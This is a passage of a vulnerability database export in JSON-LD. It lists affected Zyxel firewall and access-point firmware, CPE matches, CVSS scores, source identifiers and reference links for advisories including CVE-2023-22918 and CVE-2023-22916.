                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax655e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          }
        ]
      },
      "cve": "CVE-2023-22918",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2023-22918",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-22918",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-22918",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202304-1945",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A post-authentication information exposure vulnerability in the CGI program of Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, VPN series firmware versions 4.30 through 5.35, NWA110AX firmware version 6.50(ABTG.2) and earlier versions, WAC500 firmware version 6.50(ABVS.0) and earlier versions, and WAX510D firmware version 6.50(ABTF.2) and earlier versions, which could allow a remote authenticated attacker to retrieve encrypted information of the administrator on an affected device. ATP200 firmware, ATP100 firmware, ATP700 firmware etc. ZyXEL There are unspecified vulnerabilities in the product.Information may be obtained",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-22918"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-22918",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-22918",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22918"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "id": "VAR-202304-1973",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2023-12-18T12:54:24.930000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Security vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235566"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-of-firewalls-and-aps"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-22918"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-22918/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22918"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22918"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-22918"
          },
          {
            "date": "2023-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "date": "2023-04-24T18:15:09.027000",
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "date": "2023-04-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-25T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-22918"
          },
          {
            "date": "2023-12-05T06:29:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "date": "2023-06-12T15:40:49.187000",
            "db": "NVD",
            "id": "CVE-2023-22918"
          },
          {
            "date": "2023-05-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Product vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1945"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202304-1913

    Vulnerability from variot - Updated: 2023-12-18 12:14

    The configuration parser of Zyxel ATP series firmware versions 5.10 through 5.35, USG FLEX series firmware versions 5.00 through 5.35, USG FLEX 50(W) firmware versions 5.10 through 5.35, USG20(W)-VPN firmware versions 5.10 through 5.35, and VPN series firmware versions 5.00 through 5.35, which fails to properly sanitize user input. A remote unauthenticated attacker could leverage the vulnerability to modify device configuration data, resulting in DoS conditions on an affected device if the attacker could trick an authorized administrator to switch the management mode to the cloud mode. usg flex 100 firmware, usg flex 100w firmware, USG FLEX 200 firmware etc. ZyXEL There are unspecified vulnerabilities in the product.Information is tampered with and service operation is interrupted (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202304-1913",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 50w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg flex 50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.00"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.10"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009324"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22916"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.00",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.35",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
